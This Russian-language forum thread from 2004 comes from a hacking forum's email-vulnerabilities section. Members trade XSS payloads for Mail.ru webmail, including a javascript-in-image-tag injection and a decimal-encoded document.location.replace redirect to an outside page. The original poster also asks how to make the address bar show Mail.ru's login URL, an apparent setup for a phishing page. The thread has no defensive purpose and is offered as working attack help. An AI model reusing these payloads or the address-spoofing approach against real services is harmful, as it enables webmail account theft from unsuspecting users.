ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
Перезагрузить страницу Mail.ru: два глупых вопроса
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Mail.ru: два глупых вопроса
  #1  
Старый 14.12.2004, 06:50
Аватар для govorunov
govorunov
Новичок
Регистрация: 14.12.2004
Сообщений: 2
Провел на форуме:
1207

Репутация: 0
Question Mail.ru: два глупых вопроса
1.
Ну, допустим, есть скрипт:
<image src=javascript&#10:alert(xss)>
Действительно работает (в смысле alert выдает).

Но вот что писать вместо [alert(xss)] если мне надо замутить редирект на http://pupkin.ru/vasya.html (автоматически и в том же окне)?
Пытался сделать так:
<image src=javascript&#10:document.location.replace('http://pupkin.ru/vasya.html')>
или
<image src=javascript&#10:onLoad=window.location=("http://pupkin.ru/vasya.html")>
Без мазы.
Есть подозрения, что я облажался с синтаксисом.

Есть еще такая штука:
<SCRIPT type="text/javascript" LANGUAGE="JavaScript">
<!--
if (self.parent.frames.length == 0)
self.parent.location="http://pupkin.ru/vasya.html";
// -->
</SCRIPT>
Но как это все оформить в одну строчку???



2.
А кто-нибудь знает можно ли заменить в адресной строке [http://pupkin.ru/vasya.html] например на [http://win.mail.ru/cgi-bin/auth] или хотя бы отключить кнопку "Back"?
 
Ответить с цитированием

  #2  
Старый 15.12.2004, 00:22
Аватар для virgoz
virgoz
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме:
621131

Репутация: 47
Отправить сообщение для virgoz с помощью ICQ
По умолчанию
короче, двигай сюда http://antichat.ru/crackchat/HTML/ и кодируй строку
Цитата:
document.location.replace
в 10-ичную кодировку, и все получится...
 
Ответить с цитированием

virgoz, спасибо за подсказку!
  #3  
Старый 15.12.2004, 05:20
Аватар для govorunov
govorunov
Новичок
Регистрация: 14.12.2004
Сообщений: 2
Провел на форуме:
1207

Репутация: 0
По умолчанию virgoz, спасибо за подсказку!
ИЕС. Я СДЕЛАЛ ЭТО!

Но все-таки повторю свой второй вопрос (может кто знает):

Как заменить в адресной строке http://pupkin.ru/vasya.html например на http://win.mail.ru/cgi-bin/auth или хотя бы отключить в броузере кнопку "Back"?

Есть ли у кого на примете скрипты для этого?
 
Ответить с цитированием

  #4  
Старый 15.12.2004, 12:30
Аватар для Sati
Sati
Новичок
Регистрация: 11.12.2004
Сообщений: 3
Провел на форуме:
0

Репутация: 0
По умолчанию
2govorunov
А ты на какой почте юзал?
 
Ответить с цитированием

  #5  
Старый 15.12.2004, 17:46
Аватар для virgoz
virgoz
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме:
621131

Репутация: 47
Отправить сообщение для virgoz с помощью ICQ
По умолчанию
Цитата:
Как заменить в адресной строке http://pupkin.ru/vasya.html например на http://win.mail.ru/cgi-bin/auth или хотя бы отключить в броузере кнопку "Back"?
зайди на rootlab.ru, покрути там новостную ленту, все будет написано...
 
Ответить с цитированием

  #6  
Старый 16.12.2004, 06:42
Аватар для Sati
Sati
Новичок
Регистрация: 11.12.2004
Сообщений: 3
Провел на форуме:
0

Репутация: 0
По умолчанию
Подскажите почему не срабатывает <image src=javascript&#10:document.location.replace('http://pupkin.ru/va sya.html')>
 
Ответить с цитированием

  #7  
Старый 16.12.2004, 06:46
Аватар для Sati
Sati
Новичок
Регистрация: 11.12.2004
Сообщений: 3
Провел на форуме:
0

Репутация: 0
По умолчанию
да уж.... там было все 10-тичной кодировки ....так работает отправляю с Outlook на mail.ru как HTML открываю ящик и ничего...кроме текста.... что тут не так ?
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ